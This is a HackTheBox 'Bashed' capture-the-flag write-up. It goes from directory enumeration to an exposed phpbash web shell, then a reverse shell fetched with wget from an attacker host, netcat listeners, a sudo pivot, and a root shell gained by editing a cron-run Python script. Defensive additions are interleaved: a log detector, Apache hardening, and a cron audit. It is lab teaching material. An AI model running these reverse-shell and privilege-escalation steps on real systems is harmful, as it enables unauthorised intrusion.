In this first article, I'll explain in detail the process of gaining root access to the "Bashed" machine.
Based on the ratings of HackTheBox users, this machine is on the easier side of the difficulty scale.
[Image: difficulty rating]

As always, we start by checking the Nmap scan results:

[email protected]:~# nmap -A -sV 10.10.10.68
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-19 07:43 GMT
Nmap scan report for 10.10.10.68
Host is up (0.14s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Nmap done: 1 IP address (1 host up) scanned in 29.56 seconds

After the quick scan of the top 1000 ports, I started a full port scan (1-65535) to make sure no running service was missed on any port. This machine runs a web service on port 80, so we can enumerate directories with DirBuster (which comes with a GUI), GoBuster or dirb. Here, I used GoBuster.

[Image: the website]

When we visit the website, we find various notes on the development of phpbash. You can reach the phpbash script as well as the GitHub link of Arrexel, who created it for this machine. If you review the code on GitHub, you see that this single phpbash file is a standalone, semi-interactive web shell, which also makes it a great attack surface. Now, let's see what we got with GoBuster.

gobuster -u 10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

In the gobuster command:

  • -x specifies the file extensions to try,
  • -w specifies the wordlist you want to use.

From the GoBuster results, some file and script directories can be seen, such as "/uploads", "/php" and "/dev". In the root directory we see an index page and cannot list files. In the "dev" directory, however, directory listing is enabled and we can see phpbash.php, which is what we are looking for.
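From the defender's side, a GoBuster run like the one above leaves a very recognisable trace: a burst of 404s from one client against Apache. The detector below is an added example, not code from the writeup; it parses Apache combined-format access log lines and flags clients that exceed a 404 threshold inside a sliding time window. The log lines, IPs and user agent are constructed samples.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache "combined" log format; the groups we actually use are ip, ts and status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def find_bruteforcers(lines, window_s=60, threshold=20):
    """Return {ip: peak 404 count} for clients that exceed `threshold` 404s inside any
    `window_s`-second window. Lines are assumed to be in chronological order."""
    recent = defaultdict(deque)  # ip -> timestamps of its 404s still inside the window
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != 404:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (q[-1] - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), len(q))
    return flagged

# Constructed sample log: 25 wordlist misses from one client within 25 seconds
# (the kind of burst a directory brute-forcer produces), plus ordinary traffic from another host.
SAMPLE_LOG = [
    f'198.51.100.7 - - [19/Feb/2019:07:50:{i:02d} +0000] "GET /word{i}/ HTTP/1.1" 404 437 "-" "gobuster/3.0"'
    for i in range(25)
] + [
    '192.0.2.10 - - [19/Feb/2019:07:50:30 +0000] "GET /dev/ HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [19/Feb/2019:07:50:31 +0000] "GET /missing HTTP/1.1" 404 437 "-" "Mozilla/5.0"',
]
```

On a real host, pass the lines of /var/log/apache2/access.log; the threshold is a starting point to tune against the site's normal 404 rate.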
[Image: phpbash web shell]

First, let's learn the user and group IDs by running the id command. Then we will check whether we have permission to access the /home directory, to get the user.txt flag.

www-data@bashed:/var/www/html/dev# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@bashed:/var/www/html/dev# cd /home
www-data@bashed:/home# ls
arrexel
scriptmanager
www-data@bashed:/home# cd arrexel
www-data@bashed:/home/arrexel# ls -la
total 36
drwxr-xr-x 4 arrexel arrexel 4096 Dec 4 2017 .
drwxr-xr-x 4 root root 4096 Dec 4 2017 ..
-rw------- 1 arrexel arrexel 1 Dec 23 2017 .bash_history
-rw-r--r-- 1 arrexel arrexel 220 Dec 4 2017 .bash_logout
-rw-r--r-- 1 arrexel arrexel 3786 Dec 4 2017 .bashrc
drwx------ 2 arrexel arrexel 4096 Dec 4 2017 .cache
drwxrwxr-x 2 arrexel arrexel 4096 Dec 4 2017 .nano
-rw-r--r-- 1 arrexel arrexel 655 Dec 4 2017 .profile
-rw-r--r-- 1 arrexel arrexel 0 Dec 4 2017 .sudo_as_admin_successful
-r--r--r-- 1 arrexel arrexel 33 Dec 4 2017 user.txt

www-data@bashed:/home/arrexel# cat user.txt
JACKPOT. You have found user.txt :)

Before the privilege escalation part, let's open a reverse shell in addition to the web shell. In the following sections, I will explain why it is better to have a reverse shell. First, download the PHP tiny reverse shell I have shared on my GitHub.
Don't forget to edit the 10.10.10.10 IP and the 1234 port in the reverseshell.php file.

In the web shell, www-data has write permission on the /var/www/html/uploads directory. We can write the reverseshell.php file there and then call reverseshell.php from our browser.
To serve the file, let's use our favourite Python module, the one we use almost all the time to transfer files: SimpleHTTPServer.

[email protected]:~/Desktop/bashed# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Navigate to http://10.10.10.68/dev/phpbash.php

www-data@bashed:/var/www/html/uploads# wget http://10.10.X.21/reverseshell.php

--2019-02-19 00:27:25-- http://10.10.X.21/reverseshell.php
Connecting to 10.10.X.21:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 72 [application/octet-stream]
Saving to: 'reverseshell.php'

0K 100% 14.0M=0s

2019-02-19 00:27:25 (14.0 MB/s) - 'reverseshell.php' saved [72/72]
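The foothold above relies on two server-side conditions: directory listing under /dev and PHP execution inside an uploads directory that www-data can write to. The Apache 2.4 fragment below is an added hardening example, not configuration from the writeup or the machine; it uses the paths seen on the box and assumes mod_php (php_admin_flag has no effect under PHP-FPM, where the FilesMatch block alone does the job).

```apache
# Web root: no auto-generated index pages, so /dev/ no longer lists phpbash.php
<Directory /var/www/html>
    Options -Indexes
    AllowOverride None
    Require all granted
</Directory>

# Upload directory: whatever lands here is served as inert data, never executed
<Directory /var/www/html/uploads>
    # Disable the PHP engine for this tree (mod_php only)
    php_admin_flag engine off
    # Belt and braces: refuse to serve anything that looks like a PHP script at all
    <FilesMatch "\.(php|phtml|phar|php[0-9])$">
        Require all denied
    </FilesMatch>
</Directory>
```

Independently of this, the directory should only be writable by the web server account if the application actually needs to write there.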

Let's set up a netcat listener on our local machine as shown below.

[email protected]:~/Desktop/bashed# nc -nvlp 1234
listening on [any] 1234 ...

After calling reverseshell.php in the browser, check your nc listener:

[email protected]:~/Desktop/bashed# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.X.21] from (UNKNOWN) [10.10.10.68] 37420
bash: cannot set terminal process group (743): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bashed:/var/www/html/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@bashed:/var/www/html/uploads$ 

To get a more usable shell, type:

$ python -c "import pty; pty.spawn('/bin/bash');"

When we look around the root directory, again some files and script directories can be seen. One of them says "Enumerate more..."

www-data@bashed:/$ ls -la
ls -la
total 88
drwxr-xr-x  23 root          root           4096 Dec  4  2017 .
drwxr-xr-x  23 root          root           4096 Dec  4  2017 ..
drwxr-xr-x   2 root          root           4096 Dec  4  2017 bin
drwxr-xr-x   3 root          root           4096 Dec  4  2017 boot
drwxr-xr-x  19 root          root           4240 Feb 17 22:14 dev
drwxr-xr-x  89 root          root           4096 Dec  4  2017 etc
drwxr-xr-x   4 root          root           4096 Dec  4  2017 home
lrwxrwxrwx   1 root          root             32 Dec  4  2017 initrd.img -> boot/initrd.img-4.4.0-62-generic
drwxr-xr-x  19 root          root           4096 Dec  4  2017 lib
drwxr-xr-x   2 root          root           4096 Dec  4  2017 lib64
drwx------   2 root          root          16384 Dec  4  2017 lost+found
drwxr-xr-x   4 root          root           4096 Dec  4  2017 media
drwxr-xr-x   2 root          root           4096 Feb 15  2017 mnt
drwxr-xr-x   2 root          root           4096 Dec  4  2017 opt
dr-xr-xr-x 121 root          root              0 Feb 17 22:14 proc
drwx------   3 root          root           4096 Dec  4  2017 root
drwxr-xr-x  18 root          root            520 Feb 18 06:25 run
drwxr-xr-x   2 root          root           4096 Dec  4  2017 sbin
drwxrwxr--   2 scriptmanager scriptmanager  4096 Dec  4  2017 scripts
drwxr-xr-x   2 root          root           4096 Feb 15  2017 srv
dr-xr-xr-x  13 root          root              0 Feb 17 22:14 sys
drwxrwxrwt  10 root          root           4096 Feb 19 00:48 tmp
drwxr-xr-x  10 root          root           4096 Dec  4  2017 usr
drwxr-xr-x  12 root          root           4096 Dec  4  2017 var
lrwxrwxrwx   1 root          root             29 Dec  4  2017 vmlinuz -> boot/vmlinuz-4.4.0-62-generic
www-data@bashed:/$ cd scrpits
cd scrpits
bash: cd: scrpits: No such file or directory
www-data@bashed:/$ cd scripts
cd scripts
bash: cd: scripts: Permission denied
www-data@bashed:/$ ls -la scripts
ls -la scripts
ls: cannot access 'scripts/..': Permission denied
ls: cannot access 'scripts/test.py': Permission denied
ls: cannot access 'scripts/test.txt': Permission denied
ls: cannot access 'scripts/.': Permission denied
total 0
d????????? ? ? ? ?            ? .
d????????? ? ? ? ?            ? ..
-????????? ? ? ? ?            ? test.py
-????????? ? ? ? ?            ? test.txt

Well, well, well, we have an interesting directory here: "/scripts", owned by scriptmanager. Since "other" users, including www-data, have only the read bit on it (drwxrwxr--) and not the execute bit, we can list the file names in the directory but cannot enter it or read the files.
Let's type:

sudo -l

www-data@bashed:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

We can see that the www-data user can run any command as scriptmanager without a password.

www-data@bashed:/$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/$ 

Let's go back to the "/scripts" directory.

scriptmanager@bashed:/scripts$ ls -la
ls -la
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Feb 19 01:58 test.txt
scriptmanager@bashed:/scripts$ cat test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$ cat test.txt
cat test.txt
testing 123!scriptmanager@bashed:/scripts$ 

As can be seen, when test.py runs, the string in the script is written into test.txt. The important thing is that test.txt is owned by root, while the owner of test.py is scriptmanager, and the timestamp of test.txt changes every minute. So it is highly likely that a cron-style job running as root executes this script. By editing the test.py script you can reach the root.txt flag, or get a reverse shell with netcat.
You can use the Python reverse shell from pentestmonkey (Link). Let's edit the test.py file and change the IP and PORT to your own.

Set up your netcat listener:

[email protected]:~# nc -lnvp 1453
listening on [any] 1453 ...
connect to [10.10.x.21] from (UNKNOWN) [10.10.10.68] 50176
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
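The escalation hinges on a root cron job running a script that another user owns. The audit below is an added example, not code from the writeup or the machine: it parses /etc/crontab-style entries and flags root jobs whose script, or the directory holding it, a non-root user owns or can write. The cron line and the uid 1001 standing in for scriptmanager are assumptions, since the box's crontab is never shown; the file metadata mirrors the ls -la output above.

```python
import os
import re
import stat

INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "perl"}
# /etc/crontab format: five schedule fields, the run-as user, then the command
CRON_RE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")

def parse_system_crontab(text):
    """(user, command) pairs from /etc/crontab text; comments and VAR=value lines are skipped."""
    pairs = []
    for line in text.splitlines():
        m = CRON_RE.match(line)
        if m and not line.lstrip().startswith("#") and "=" not in line.split()[0]:
            pairs.append((m.group("user"), m.group("cmd")))
    return pairs

def script_path(command):
    """First absolute path in the command that is not an interpreter binary."""
    for tok in command.split():
        if tok.startswith("/") and os.path.basename(tok) not in INTERPRETERS:
            return tok
    return None

def audit_entry(user, command, meta_of):
    """Findings for one root job; meta_of(path) -> (owner_uid, permission bits)."""
    path = script_path(command)
    if user != "root" or path is None:
        return []
    parent = os.path.dirname(path)
    (uid, mode), (duid, dmode) = meta_of(path), meta_of(parent)
    writable = stat.S_IWGRP | stat.S_IWOTH  # group or world write bit
    checks = [
        (uid != 0, f"{path} runs as root but is owned by uid {uid}"),
        (mode & writable, f"{path} is group/world writable (mode {mode:o})"),
        (duid != 0 or dmode & writable, f"{parent} is modifiable by a non-root user, so {path} can be replaced"),
    ]
    return [msg for bad, msg in checks if bad]

def audit_crontab(text, meta_of):
    """Map each flagged command to its findings."""
    return {c: f for u, c in parse_system_crontab(text) if (f := audit_entry(u, c, meta_of))}

# Constructed sample: the cron line is an assumption (the box's crontab is never shown);
# metadata mirrors the ls -la output above, with uid 1001 standing in for scriptmanager.
SAMPLE_CRONTAB = "SHELL=/bin/sh\n* * * * * root python /scripts/test.py\n0 3 * * * root /usr/local/bin/backup.sh\n"
SAMPLE_META = {"/scripts/test.py": (1001, 0o644), "/scripts": (1001, 0o774),
               "/usr/local/bin/backup.sh": (0, 0o755), "/usr/local/bin": (0, 0o755)}
```

On a real host, pass a meta_of that returns (st.st_uid, stat.S_IMODE(st.st_mode)) from os.stat, and read the text from /etc/crontab and /etc/cron.d.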